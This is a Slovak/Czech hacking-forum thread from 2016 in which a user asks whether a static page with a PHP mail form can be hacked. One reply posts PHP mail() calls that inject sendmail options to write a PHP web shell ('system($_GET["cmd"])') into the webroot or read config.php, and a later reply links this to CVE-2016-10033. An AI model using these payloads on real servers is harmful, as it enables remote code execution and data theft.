bezpecnost HTML stranky, otazka

HackForum

bezpecnost HTML stranky, otazka #
Ahoj, mam otazku, dajme tomu ze mam naprogramovanu HTML stranku, na stranke nemam naprogramovany ziadny LOG-IN ani nic podobne, ide len o cisto HTML subor ktory ma akurat tak PHP formular cez ktory ide odoslat mail ... taku to stranku teda umiestnim napr. na Webzdarma... a konecnce k mojej otazke, da sa taka to stranka hacknut ? podla mojho presvedcenia nie :D ale tak to si myslim ja :D ... cize ak by som mal teoreticky pravdu a samotna ta stranka sa nedala hacnut, tak ten kdo by ju chcel hacknut musel by sa dostat na ten samotny web Webzdarma a vytiahnut z nej LOGIN ? ... alebo ako to teda je... Dakujem za odpovede
(odpovědět)
Eazy | E-mail2.11.2016 1:13
re: bezpecnost HTML stranky, otazka #
1) Webzdarma rozhodně není nejbezpečnější webhosting.
2) Záleží, jak ten jediný formulář napíšeš. I v tak jednoduchém kódu se dá nasekat spousty chyb.
Odpověď tedy: Ano, dalo by se to teoreticky hacknout.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP2.11.2016 8:49
re: bezpecnost HTML stranky, otazka #
$to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options);

$subject = ''; $message = ''; $headers = ''; $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'; mail($to, $subject, $message, $headers, $options);
(odpovědět)
Pa1acinka | 77.247.181.*2.11.2016 23:08
re: bezpecnost HTML stranky, otazka #
hmm tak CVE-2016-10033 uz neni 0day :D
(odpovědět)
Pa1acinka | 94.142.242.*27.12.2016 19:46

Zpět
 
 
 

 
BBCode